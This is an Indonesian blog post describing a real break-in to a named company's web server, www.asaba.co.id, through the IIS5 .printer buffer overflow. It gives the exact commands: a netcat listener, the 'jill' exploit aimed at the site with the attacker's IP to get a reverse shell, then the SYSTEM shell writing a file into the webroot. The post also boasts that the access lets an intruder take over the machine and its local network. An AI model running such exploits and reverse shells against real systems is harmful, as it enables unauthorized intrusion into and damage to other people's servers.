mp3 Player

Efek klik kanan

Senin, 25 April 2016

Home » » Exploitasi www.asaba.co.id melalui Web Printing

Exploitasi www.asaba.co.id melalui Web Printing

By 05.58No comments
Exploitasi www.asaba.co.id melalui Web Printing 

Bukan ! *@#&*&@ ini bukan unicode. Inilah contoh nyata dari exploitasi melalui web printing dari artikel sebelumnya oleh saya dan djava8zi jadi bisa dikatakan sebagai artikel versi ke 3. Karena banyaknya yang menanyakan tentang bagaimana exploitasi dari web printing ini maka dengan ini saya akan memberikan contoh nyata dari exploitasi ini dan semoga semua pertanyaan bisa terjawab.



Seperti yang telah di terangkan pada 2 artikel sebelumnya kita akan melakukan exploitasi berdasarkan keterangan yang telah diberikan sehingga saya tidak perlu lagi memberikan anda keterangan tentang bug ini terlalu jauh. Berikut adalah tampilan dari sisi listening windows (note : saya menjalankan ini semua melalui windows 2000 profesional sebagai bantahan atas banyak pernyataan yang mengatakan anda harus menggunakan linux)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>f:

F:\>cd jill

F:\Jill>nc -l -p 33 -vv
listening on [any] 33 ...



Kemudian saya menjalankan lagi windows ke 2 dengan jill

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>f:

F:\>cd jill

F:\Jill>jill www.asaba.co.id 80 202.152.24.101 33
iis5 remote .printer overflow.
dark spyrit / beavuh labs.

connecting...
sent...
you may need to send a carriage on your listener if the shell doesn't appear.
have fun!

F:\Jill>



Dari windows pertama kemudian saya menjalankan perintah :



F:\Jill>nc -l -p 33 -w
listening on [any] 33 ...
202.155.6.162: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [202.152.24.101] from (UNKNOWN) [202.155.6.162] 5576: NO_DATA


Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>cd\inetpub\wwwroot
cd\inetpub\wwwroot

C:\Inetpub\wwwroot>echo im  Here  > news.txt



Kini selesailah sudah tugas sederhana ini, dimana tentu saja dengan berbagai macam teknik dan karena anda mempunyai hak system banyak yang bisa dilakukan seperti mengambil alih seluruh komputer bahkan jaringan yang lokal bisa anda dapatkan. Ngak percaya ? ;) karena anda masuk dengan shell semacam telnet anda bisa melakukan banyak sekali hal yang jauh lebih berbahaya daripada bug unicode. Sebagai bukti dari file yang telah di buat anda bisa melihat ke alamat : http://www.asaba.co.id/news.txt





Note :  Kami tidak merusak data maupun hal-hal lain yang merugikan, kejadian-kejadian diluar ini atas dipublikasikannya artikel ini adalah diluar tanggung jawab kami.





0 komentar:

Posting Komentar